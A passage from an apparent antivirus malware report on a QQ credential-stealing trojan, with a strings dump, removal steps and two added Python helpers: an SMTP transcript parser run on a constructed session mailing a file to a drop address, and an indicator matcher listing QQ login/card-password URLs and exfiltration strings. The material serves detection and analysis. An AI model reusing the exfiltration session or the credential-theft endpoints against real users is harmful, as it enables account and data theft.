U'K.kj
pA"%c
/ÔT!
 z.dS
Þo!
{D%f$
'0SSh
,.Hq_w
Z.Wd4
/%dQ/ngt
d[[.kU
O%uvl$
n^.ot
`gbuJ*%D
>ag%dW
[email protected]
zd)%s(m
pm%U%!
O %cJ3
ke%Cng
U.uC<
'%d!2>=
.aTpe
1eÛ
g9.gqJo
".nGlJ
y%Dg>:#B
w(KN`k%F 
SetViewportOrgEx
ShellExecuteA
vU.IS
UnhookWindowsHookEx
OffsetViewportOrgEx
D].hN:
comdlg32.dll
OLEAUT32.dll
1, 0, 6, 6
20130907181933
(*.*)
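
The SMTP command templates in the dump above (HELO %s / EHLO %s, AUTH LOGIN, MAIL FROM:<%s>, RCPT TO:<%s>, Content-Type: application/octet-stream and Content-Disposition: attachment; filename=%s), together with the smtp.qq.com string, describe a hard-coded mail client used to send data out, which is what the EmailWorm behaviour flag in the summary refers to. The Python below is an added example and not part of the Lavasoft report: it parses a client/server SMTP transcript of exactly that shape and pulls out what an analyst wants from a sandbox capture: the AUTH LOGIN credentials, which are only base64-encoded and therefore recoverable from any plaintext capture, the envelope sender and recipients, and any declared attachment. The transcript is constructed for the example; the account names and credentials are invented, smtp.qq.com and the jl.txt name come from the strings above, and that jl.txt is the file being mailed is an assumption.

```python
import base64
import binascii
import re

# Constructed transcript (client "C:", server "S:") following the sample's command
# templates. Accounts and credentials are invented (base64 of "mailer"/"hunter2");
# smtp.qq.com and jl.txt are taken from the report's strings.
SAMPLE_SESSION = """\
S: 220 smtp.qq.com Esmtp QQ Mail Server
C: EHLO victim-pc
S: 250-smtp.qq.com
S: 250 AUTH LOGIN PLAIN
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: bWFpbGVy
S: 334 UGFzc3dvcmQ6
C: aHVudGVyMg==
S: 235 Authentication successful
C: MAIL FROM:<mailer@example.com>
S: 250 Ok
C: RCPT TO:<drop@example.com>
S: 250 Ok
C: DATA
S: 354 End data with <CR><LF>.<CR><LF>
C: From: mailer@example.com
C: To: drop@example.com
C: Subject: jl
C: Content-Type: application/octet-stream; name=jl.txt
C: Content-Disposition: attachment; filename=jl.txt
C:
C: aGFydmVzdGVkIGRhdGE=
C: .
S: 250 Ok: queued
C: QUIT
"""

_ANGLE = re.compile(r"<([^>]*)>")
_ATTACH = re.compile(r'Content-Disposition:\s*attachment;\s*filename="?([^";\s]+)', re.I)


def _b64_text(token):
    """Decode one AUTH LOGIN token; None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_smtp_session(transcript):
    """Walk a C:/S: transcript and collect banner host, AUTH LOGIN credentials,
    envelope sender/recipients and attachments declared in the DATA section."""
    facts = {"server": None, "auth_login": False, "username": None,
             "password": None, "mail_from": None, "rcpt_to": [], "attachments": []}
    expecting = None          # "user" / "pass" while inside the AUTH LOGIN dialogue
    in_data = False
    for raw in transcript.splitlines():
        side, _, line = raw.partition(":")
        line = line.strip()
        if side == "S":                              # only the banner matters here
            if line.startswith("220 "):
                facts["server"] = line[4:].split()[0]
            continue
        if side != "C":
            continue
        if in_data:                                  # message body until lone "."
            if line == ".":
                in_data = False
            else:
                m = _ATTACH.match(line)
                if m:
                    facts["attachments"].append(m.group(1))
            continue
        if expecting == "user":
            facts["username"], expecting = _b64_text(line), "pass"
            continue
        if expecting == "pass":
            facts["password"], expecting = _b64_text(line), None
            continue
        upper = line.upper()
        if upper.startswith("AUTH LOGIN"):
            facts["auth_login"] = True
            parts = line.split()
            if len(parts) == 3:                      # "AUTH LOGIN <b64 user>" form
                facts["username"], expecting = _b64_text(parts[2]), "pass"
            else:
                expecting = "user"
        elif upper.startswith("MAIL FROM:"):
            m = _ANGLE.search(line)
            facts["mail_from"] = m.group(1) if m else line[10:].strip()
        elif upper.startswith("RCPT TO:"):
            m = _ANGLE.search(line)
            facts["rcpt_to"].append(m.group(1) if m else line[8:].strip())
        elif upper == "DATA":
            in_data = True
    return facts


def exfiltration_findings(facts):
    """Turn the parsed facts into the lines that go into the report."""
    findings = []
    if facts["auth_login"] and facts["username"] is not None:
        findings.append("AUTH LOGIN credentials recovered: %s / %s"
                        % (facts["username"], facts["password"]))
    if facts["attachments"]:
        findings.append("attachment(s) sent: %s" % ", ".join(facts["attachments"]))
    if facts["mail_from"] and facts["rcpt_to"]:
        findings.append("envelope %s -> %s"
                        % (facts["mail_from"], ", ".join(facts["rcpt_to"])))
    return findings
```

Feed it a reassembled TCP stream from the sandbox pcap with the two directions tagged as in the sample; as long as the sample submits over plain port 25 rather than STARTTLS, the mail account it was built with, its password and the drop address all come straight out of the capture, and the recovered account is the IOC worth pivoting on.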

%original file name%.exe_664_rwx_00621000_00001000:

SetViewportExtEx
WS2_32.dll
KERNEL32.dll
GetViewportOrgEx
WinExec
GetViewportExtEx
WININET.dll
GetProcessHeap

%original file name%.exe_664_rwx_0077B000_00001000:

ShellExecuteA

%original file name%.exe_664_rwx_10001000_00039000:

L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
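
Read together, the dumped strings form a compact indicator set: the ptlogin2.qq.com captcha URL and the pay.qq.com card-save CGI with its &CardPassword= parameter (the Trojan-PSW side), the SMTP templates and smtp.qq.com (the exfiltration channel), SetWindowsHookExA/UnhookWindowsHookEx next to WinExec and ShellExecuteA, and the packaging artefacts (.vmp0/.vmp1 are VMProtect's default section names, UPX0/UPX1 are UPX's, and SkinH_EL.dll is the SkinH skinning library the sample drops to C:\). The script below is an added example, not Lavasoft's tooling: it extracts printable strings from a blob the way `strings` does, matches them against those groups and returns a verdict, so a second dump or a related sample can be checked the same way. The indicator URLs are written undefanged (the report shows them as hXXp:// and VVV) so they match real binaries; the sample dump is constructed for the demonstration and is not data from this file.

```python
import re
import sys

# Indicator groups drawn from the strings dumped for this sample. URLs are written
# undefanged so they match what a binary actually contains.
INDICATORS = {
    "qq_credential_theft": [
        b"ptlogin2.qq.com/getimage",
        b"pay.qq.com/cgi-bin/account/account_qqcard_save_qbqd.cgi",
        b"&CardPassword=",
    ],
    "smtp_exfiltration": [
        b"smtp.qq.com", b"AUTH LOGIN", b"MAIL FROM:<%s>", b"RCPT TO:<%s>",
        b"Content-Disposition: attachment; filename=%s",
    ],
    "hooking_and_execution": [
        b"SetWindowsHookExA", b"UnhookWindowsHookEx", b"WinExec", b"ShellExecuteA",
    ],
    # .vmp0/.vmp1 = VMProtect sections, UPX0/UPX1 = UPX, SkinH_EL.dll = SkinH library
    "packaging": [b"SkinH_EL.dll", b".vmp0", b".vmp1", b"UPX0", b"UPX1"],
}

# Constructed stand-in for a memory dump: null-separated strings of the kinds seen
# in the report plus binary noise. Not bytes from the real sample.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b".text\x00.rdata\x00.vmp0\x00.vmp1\x00.reloc\x00"
    + b"\x01\x02wininet.dll\x00HttpSendRequestA\x00"
    + b"http://ptlogin2.qq.com/getimage?aid=11000101\x00"
    + b"http://pay.qq.com/cgi-bin/account/account_qqcard_save_qbqd.cgi\x00&CardPassword=\x00"
    + b"smtp.qq.com\x00AUTH LOGIN\x00MAIL FROM:<%s>\x00RCPT TO:<%s>\x00"
    + b"Content-Disposition: attachment; filename=%s\x00"
    + b"SetWindowsHookExA\x00WinExec\x00SkinH_EL.dll\x00"
    + bytes(range(256))
)


def extract_strings(data, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, as `strings` would print."""
    return re.compile(rb"[\x20-\x7e]{%d,}" % min_len).findall(data)


def match_indicators(strings):
    """Map each group to the indicators found as substrings of the extracted strings."""
    return {
        group: [ind.decode() for ind in inds if any(ind in s for s in strings)]
        for group, inds in INDICATORS.items()
    }


def triage(data):
    """Two or more indicator groups present -> suspicious, with the reasons listed."""
    hits = match_indicators(extract_strings(data))
    reasons = []
    if hits["qq_credential_theft"]:
        reasons.append("references QQ login/payment endpoints and a CardPassword parameter")
    if hits["smtp_exfiltration"]:
        reasons.append("embeds an SMTP client (AUTH LOGIN, MAIL FROM, RCPT TO, attachment)")
    if hits["hooking_and_execution"]:
        reasons.append("names Windows hook and process-launch APIs")
    if hits["packaging"]:
        reasons.append("carries VMProtect/UPX section names or the SkinH skinning DLL")
    verdict = ("suspicious: " + "; ".join(reasons)) if len(reasons) >= 2 else "no strong indicators"
    return {"hits": hits, "verdict": verdict}


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    result = triage(blob)
    for group, found in result["hits"].items():
        print("%-24s %s" % (group, ", ".join(found) or "-"))
    print(result["verdict"])
```

Run it against the unpacked process dump rather than the file on disk: the report marks the sample as packed (Entropy: Packed, PEID UPolyXv05_v6, .vmp0/.vmp1 sections), so the QQ and SMTP strings only exist in memory after the protector has unpacked the code, which is also why they appear in the %original file name%.exe_664 dump above and not in a static strings pass.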


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_bg[1].gif (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA98G7TP.html (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\成功信息[1].htm (943 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\slave[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CACDY72N.html?partner=bd3 (621 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\成功信息[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\domains[1].js (7262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CAC9KN0N.htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\t_141_201401111[1].css (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\parking_caf_141_1402251[1].js (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\secondtier_caf[1].js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\slave[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\caf[1].js (258 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CARY3VYG.htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\caf[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\成功信息[1].htm (761 bytes)
    C:\SkinH_EL.dll (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\search_language_1[1].jpg (2 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
